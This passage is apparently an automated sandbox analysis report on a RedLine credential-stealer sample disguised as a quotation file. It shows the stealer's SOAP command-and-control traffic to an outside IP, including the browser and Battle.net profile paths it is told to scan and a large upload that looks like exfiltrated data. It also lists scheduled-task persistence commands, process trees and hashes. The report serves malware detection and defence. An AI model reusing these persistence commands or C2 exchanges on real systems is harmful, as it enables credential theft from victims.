2	192.168.2.3	49760	185.222.58.90	17910	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Jun 20, 2022 05:29:17.025917053 CEST	3749	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 185.222.58.90:17910 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jun 20, 2022 05:29:17.228621006 CEST	3749	IN	HTTP/1.1 100 Continue
Jun 20, 2022 05:29:17.366003036 CEST	3750	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Mon, 20 Jun 2022 03:29:17 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Jun 20, 2022 05:29:28.601846933 CEST	4416	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 185.222.58.90:17910 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Jun 20, 2022 05:29:28.635574102 CEST	4416	IN	HTTP/1.1 100 Continue
Jun 20, 2022 05:29:28.920758963 CEST	4459	IN	HTTP/1.1 200 OK Content-Length: 4793 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Mon, 20 Jun 2022 03:29:28 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 31 30 33 2e 31 31 33 2e 31 34 31 2e 32 35 32 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 2f 61 3a 42 6c 6f 63 6b 65 64 49 50 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>103.113.141.252</b:string></a:BlockedIP><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data</b

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49823	185.222.58.90	17910	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Jun 20, 2022 05:29:56.872577906 CEST	13484	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 185.222.58.90:17910 Content-Length: 1107783 Expect: 100-continue Accept-Encoding: gzip, deflate
Jun 20, 2022 05:29:59.387840033 CEST	14618	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Mon, 20 Jun 2022 03:29:59 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49834	185.222.58.90	17910	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Jun 20, 2022 05:29:59.415884972 CEST	14618	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 185.222.58.90:17910 Content-Length: 1107775 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jun 20, 2022 05:29:59.456944942 CEST	14618	IN	HTTP/1.1 100 Continue
Jun 20, 2022 05:30:00.144274950 CEST	15750	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Mon, 20 Jun 2022 03:29:59 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Target ID:	0
Start time:	05:28:06
Start date:	20/06/2022
Path:	C:\Users\user\Desktop\QUOTATION062022.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\QUOTATION062022.exe"
Imagebase:	0x890000
File size:	584704 bytes
MD5 hash:	87AF8A3865F441EB06B4EBBEEA330099
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.294290970.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Target ID:	4
Start time:	05:28:24
Start date:	20/06/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Imagebase:	0xe10000
File size:	2688096 bytes
MD5 hash:	B3A917344F5610BEEC562556F11300FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.377531030.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000000.280640029.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.280640029.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.379339995.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000000.280345699.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.280345699.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000000.280075707.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.280075707.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000000.279823172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Target ID:	5
Start time:	05:28:26
Start date:	20/06/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	6
Start time:	05:28:26
Start date:	20/06/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
Imagebase:	0xc20000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	7
Start time:	05:28:27
Start date:	20/06/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	8
Start time:	05:28:28
Start date:	20/06/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
Imagebase:	0x3b0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	9
Start time:	05:28:28
Start date:	20/06/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe" /C copy "C:\Users\user\Desktop\QUOTATION062022.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe
Imagebase:	0xc20000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	10
Start time:	05:28:29
Start date:	20/06/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	11
Start time:	05:28:30
Start date:	20/06/2022
Path:	C:\Users\user\AppData\Roaming\Data\Data.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Data\Data.exe
Imagebase:	0xe00000
File size:	584704 bytes
MD5 hash:	87AF8A3865F441EB06B4EBBEEA330099
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.361910499.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 49%, ReversingLabs
Reputation:	low

Show Windows behavior

Target ID:	23
Start time:	05:28:52
Start date:	20/06/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Imagebase:	0xe10000
File size:	2688096 bytes
MD5 hash:	B3A917344F5610BEEC562556F11300FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000002.484490972.000000000731F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000000.339858194.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.482951667.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000000.340545175.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000000.340545175.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000000.340235568.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000000.340235568.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000017.00000000.340809810.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000000.340809810.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Target ID:	24
Start time:	05:28:54
Start date:	20/06/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	25
Start time:	05:28:54
Start date:	20/06/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
Imagebase:	0xc20000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	26
Start time:	05:28:56
Start date:	20/06/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	27
Start time:	05:28:56
Start date:	20/06/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\Data\Data.exe'" /f
Imagebase:	0x3b0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	28
Start time:	05:28:58
Start date:	20/06/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe" /C copy "C:\Users\user\AppData\Roaming\Data\Data.exe" "C:\Users\user\AppData\Roaming\Data\Data.exe
Imagebase:	0xc20000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Target ID:	29
Start time:	05:29:01
Start date:	20/06/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c9170000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Execution Graph

Execution Coverage:	22.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	51.9%
Total number of Nodes:	54
Total number of Limit Nodes:	0

Executed Functions

Function 04E80040 Relevance: 4.5, Instructions: 4480
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.294719481.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cd35bdac9db1dbb79cfbdd4aac96cf8f1be5d1539b164882911976d0cb607c4
Instruction ID: 7508f501c9d10c27cb954ef0386a45c6cf37c9caaef31a8b8b638d9001f23c83
Opcode Fuzzy Hash: 4cd35bdac9db1dbb79cfbdd4aac96cf8f1be5d1539b164882911976d0cb607c4
Instruction Fuzzy Hash: 95A35870E142688FCB54EF38D98569DBBB2FB89300F4049E9D48CA7258DB386E95CF51

Uniqueness

Uniqueness Score: -1.00%

Function 04E90040 Relevance: 4.4, Instructions: 4397
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.294739377.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e90000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc5df49ed5ab0680603fb5b9fb94ff5f26adde1245afa666d470da507388ff82
Instruction ID: ea08382fea82d880207167662e090a84281dd3752ef54775610b4260ae489687
Opcode Fuzzy Hash: fc5df49ed5ab0680603fb5b9fb94ff5f26adde1245afa666d470da507388ff82
Instruction Fuzzy Hash: F0932A70D141288FDB58EF39D98669CBBB2FB88305F0045EAD44CA7298DB386E95CF51

Uniqueness

Uniqueness Score: -1.00%

Function 04E856C8 Relevance: 4.4, Instructions: 4374
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.294719481.0000000004E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e80000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc87a5156f841f9bcd62dee8b35ac7bb6eca1c6f38bc42bdbbff5ecb59f2b0a4
Instruction ID: a16935bab1c5f176cd883e7f00869a593e6a32f180794ed68208e20c6e0dfe86
Opcode Fuzzy Hash: cc87a5156f841f9bcd62dee8b35ac7bb6eca1c6f38bc42bdbbff5ecb59f2b0a4
Instruction Fuzzy Hash: 0D932870E151288FDB64EF39D995A9CBBB2FB88600F0045EED44CA7258DB386E95CF11

Uniqueness

Uniqueness Score: -1.00%

Function 04E70040 Relevance: 4.3, Instructions: 4315
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.294695005.0000000004E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e70000_QUOTATION062022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfc76b51190a7eb8dc2e11c86c6bb5619b3366977f976b525c0f41d0215a695b
Instruction ID: b4d780e8a6e6540f2d5d48c42fe04b2719aece6f862523474fd10f77f2786e79
Opcode Fuzzy Hash: bfc76b51190a7eb8dc2e11c86c6bb5619b3366977f976b525c0f41d0215a695b
Instruction Fuzzy Hash: EC934B70E14128CFDB58EF39D98569DBBB2FB88300F4049E9D488A7258DB386E95CF51

Uniqueness

Uniqueness Score: -1.00%

Function 04EB1C78 Relevance: 4.2, Strings: 1, Instructions: 2919
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

G, xrefs: 04EB4DB8

Memory Dump Source

Source File: 00000000.00000002.294780768.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4eb0000_QUOTATION062022.jbxd

Similarity

API ID:
String ID: G
